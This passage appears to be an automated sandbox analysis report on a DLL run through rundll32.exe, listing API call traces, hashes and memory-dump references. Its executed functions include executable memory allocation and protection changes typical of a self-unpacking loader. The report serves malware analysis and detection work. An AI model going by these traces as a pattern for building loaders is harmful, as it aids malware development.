                                                                                                                                                                                                                                                                    • Opcode ID: 0e1467c51ca839c1c1521eb53528f2bf45432808041f19ef1d97527362e7fec4
                                                                                                                                                                                                                                                                    • Instruction ID: 1e53db9646c48c4b6a9a7d16aff94c1e03efa8c9ac5e048a2fe0e03364cc73e4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e1467c51ca839c1c1521eb53528f2bf45432808041f19ef1d97527362e7fec4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6419AF5A4013DAFDB11DBD9CC8599EBBBEEB89B10F304456E5149B200D7708940CF60
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,0000079C,00003000,00000040,0000079C,6E271E18), ref: 6E272480
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6E271E7C), ref: 6E2724B7
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6E272517
                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E27254D
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E1F0000,00000000,00000004,6E2723A2), ref: 6E272652
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E1F0000,00001000,00000004,6E2723A2), ref: 6E272679
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2723A2), ref: 6E272746
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2723A2,?), ref: 6E27279C
                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2727B8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605412439.000000006E271000.00000040.00020000.sdmp, Offset: 6E271000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2574235972-0
                                                                                                                                                                                                                                                                    • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                                    • Instruction ID: f17b0aec824730e599b8e1a80d803f161a2cfee727357e17c12446058763471d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7D1AEB66002869FDF11CF54C880F517BA6FF48710B0A45A4EE0AAF75BE771B850DB62
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3136044242-0
                                                                                                                                                                                                                                                                    • Opcode ID: 266bd8c67d8b8a25e08ebad9d8d9fef55d4240af36dd71951b5b26b7bbd76e98
                                                                                                                                                                                                                                                                    • Instruction ID: 4d765f2ace651ee4fdc93cee81dca30f388468670c158b5a3736813278213ce8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 266bd8c67d8b8a25e08ebad9d8d9fef55d4240af36dd71951b5b26b7bbd76e98
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC215EF190163EEBDF654A95CC40EAF3B7BDB85B95B214625FC145B690C7308E428FA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6E237387
                                                                                                                                                                                                                                                                      • Part of subcall function 6E237BA4: RtlInitializeSListHead.NTDLL(6E27C780), ref: 6E237BA9
                                                                                                                                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E2373F1
                                                                                                                                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 6E23743B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 2097537958-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: faf5295c1622196ac71b576df67fcae0100edd1d96b8c6bd83ab9e8e9e1e7280
                                                                                                                                                                                                                                                                    • Instruction ID: 15b2e55c67bfbeb6cadb9e5c293cfe59c448b8e5c825cbb3d2de61b1e9396fe4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faf5295c1622196ac71b576df67fcae0100edd1d96b8c6bd83ab9e8e9e1e7280
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F021ACBA50423FDBDF04ABF498197DE7B775B0672AF304859D9456A2C0CF611051CE61
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,?), ref: 6E2335B3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9239825f99d2cbf352a5f025acb91148603ca9e2c73b8d2b5b129fc9dc4f70d4
                                                                                                                                                                                                                                                                    • Instruction ID: 5bde274960abf5af74021a377907620d7e60472df33b0653907b0a4a438c3875
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9239825f99d2cbf352a5f025acb91148603ca9e2c73b8d2b5b129fc9dc4f70d4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D71D2719005798FCF14CF6DC498AA97BE7BB46321F24825AE494C7381E2B59A0CDFA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2409B9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: 449622bdf49c6de57c84acab351458f4a78e05e6a085d1b0b271588136038477
                                                                                                                                                                                                                                                                    • Instruction ID: bddc72d36bee3388804d88a0417074f2f184fe88000df087203a3c896b938a24
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 449622bdf49c6de57c84acab351458f4a78e05e6a085d1b0b271588136038477
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97F02B31A4563FEBFB495AE6CC04F4B375FBF92F70B104011A828A6184EB20D4C086A3
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 6E24297E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456CE
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456E0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456F2
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245704
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245716
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245728
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24573A
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24574C
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24575E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245770
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245782
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245794
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2457A6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242973
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242995
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429AA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429B5
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429D7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429EA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429F8
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A03
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A3B
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A42
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A5F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A77
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                                    • Opcode ID: a44816209776e4e40cd017dc98265cd90fc3f4c90bc5874762c8ced33a29f924
                                                                                                                                                                                                                                                                    • Instruction ID: a63bd5db076cb06e5093edef45ccf21baba3bcc49aedbfc37e97efda839b46bd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a44816209776e4e40cd017dc98265cd90fc3f4c90bc5874762c8ced33a29f924
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E3190B260031ADFEB648BB6DC40B8673EABF00355F314D19E869D7154DB31E8408F14
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2395CB
                                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 6E2395F2
                                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 6E2396FE
                                                                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6E239753
                                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2397D9
                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 6E239860
                                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 6E23987B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 4234981820-393685449
                                                                                                                                                                                                                                                                    • Opcode ID: 89fb8a6629044aadd5b89d7d0fe7843b440c4d45bb862605e9be3829b6a029d3
                                                                                                                                                                                                                                                                    • Instruction ID: c30f1c125f4d8d96e09fbba9d648f03eba2003405368d434e649a846f3ba32d9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89fb8a6629044aadd5b89d7d0fe7843b440c4d45bb862605e9be3829b6a029d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3C17AB5C0422EAFCF15CFE4C88099EBB7ABF46315F20455AE8116B249DB31DA61CF91
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D27E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D28A
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D295
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2A0
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2AB
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2B6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2C1
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2CC
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2D7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2E5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: f72fbd0f187e58208024119c1af356774bea16056e3331e8826c5ce6e2e4dffe
                                                                                                                                                                                                                                                                    • Instruction ID: 97eae551447f59d9f4220a35069cb2041860641c9e00c284b1040b41b4561110
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f72fbd0f187e58208024119c1af356774bea16056e3331e8826c5ce6e2e4dffe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 052187BA94011CAFCF41DFE4D890DDD7BBAFF08244B218566E9199B121DB31DA55CF80
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f032beec8e7be82919b742781db431c000ba9a4d0a581797c3dbcd09a25ed867
                                                                                                                                                                                                                                                                    • Instruction ID: 19ec7bd6c306872e3df39dc9319bac30a882b955fdce2cc641e6d8f66d2fe56b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f032beec8e7be82919b742781db431c000ba9a4d0a581797c3dbcd09a25ed867
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3EC1BFB490421EDFDB09CFE8C894FADBBB6BF99304F104459E4159B281E7709981CF62
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E245818: _free.LIBCMT ref: 6E24583D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24589E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2458A9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2458B4
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245908
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245913
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24591E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245929
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                                    • Instruction ID: e200c28aa309deb199ffb0a7d1aae8d8150d25cca04757747193a0a81902d3e0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0116DB5590B0CEBE725A7F0DC06FCB779EAF00704F508C14A6EE66050DB65A5454F90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6E243593
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6E243772
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6E24378F
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,6E23F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2437D7
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E243817
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2438C3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4031098158-0
                                                                                                                                                                                                                                                                    • Opcode ID: c8fbb2a55b857db37d008f2e8467b4e1bb3a6be7f98c548b194fe346c5bbc16d
                                                                                                                                                                                                                                                                    • Instruction ID: 0d1e64fe4c333ceb160657491c870788f40800a22dbcda45e6c6c0ff1a012c30
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8fbb2a55b857db37d008f2e8467b4e1bb3a6be7f98c548b194fe346c5bbc16d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D187B5D0025EDFCF19CFE8C8849EDFBB6BF49314F24016AE855AB241D630AA46CB50
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,6E238DA8,6E23700A,6E237312), ref: 6E2391A7
                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2391B5
                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2391CE
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,6E238DA8,6E23700A,6E237312), ref: 6E239220
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                    • Opcode ID: 60ae02611749972d842b700a6a022a784de06b2222b6f7eb8186a65568a7fc9e
                                                                                                                                                                                                                                                                    • Instruction ID: 930277948b7e7d787cff071e99c6885fe24a7b571aceae47d41331a3c5d5c687
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60ae02611749972d842b700a6a022a784de06b2222b6f7eb8186a65568a7fc9e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 310122F2219A3F9FEF1411F5AC8CA96375BEB03779730022AE520910C9EF924825DD24
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 1740715915-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: c98c0a8c22912f7a8176bdbd3770440f331ecb41c43c7e77dc0dadf1a08ae1b6
                                                                                                                                                                                                                                                                    • Instruction ID: 36f33edce26857166440eb809913867e5f9506fd293a054d9989b9538df4a162
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c98c0a8c22912f7a8176bdbd3770440f331ecb41c43c7e77dc0dadf1a08ae1b6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D451A0F650462F9FDB148FD9C850BAAB7BAAF02715F204529E8154A2D8DF31E860CF90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E24120C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                    • API String ID: 0-2837366778
                                                                                                                                                                                                                                                                    • Opcode ID: 6550e506ada450b4f32768c1e5ee30bf7dfdfe672b1a57dd6a9019d2a9035819
                                                                                                                                                                                                                                                                    • Instruction ID: f25f4eab8f2f5374e3eda02fb91543d6349478fe7a208cedafa672b80af60d9c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6550e506ada450b4f32768c1e5ee30bf7dfdfe672b1a57dd6a9019d2a9035819
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C218E7161422EEF9B58DFE5DC80D9B77AFAF053697104A14F928D7150E730ECA88BA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457C7
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457D9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457EB
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457FD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24580F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: b6cfef0e0eea268b052397803a2f4b4ea3abc4b3350a38ab18bafc1ef3de69ad
                                                                                                                                                                                                                                                                    • Instruction ID: 7d08c920d93dffcf1ec1fdc7d3acf7916c15eb3a41dfdec6daa18bebbd77aea9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6cfef0e0eea268b052397803a2f4b4ea3abc4b3350a38ab18bafc1ef3de69ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FF0377148062EDB8B94DA98F8C8C4A33EFBB007127714809E4ACD7500DB31F8808EA4
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID: *?
                                                                                                                                                                                                                                                                    • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                                    • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                                    • Instruction ID: edf36dcc8f8690f171f25a929bab9b3563e75a4eaf6223be9e423c542be32cbd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37614CB5D0021EDFCB18CFA8C8809DDBBF6EF58314B248569D815E7304E775AA818F90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6E238E5F
                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6E238F13
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.605173313.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm$y#n
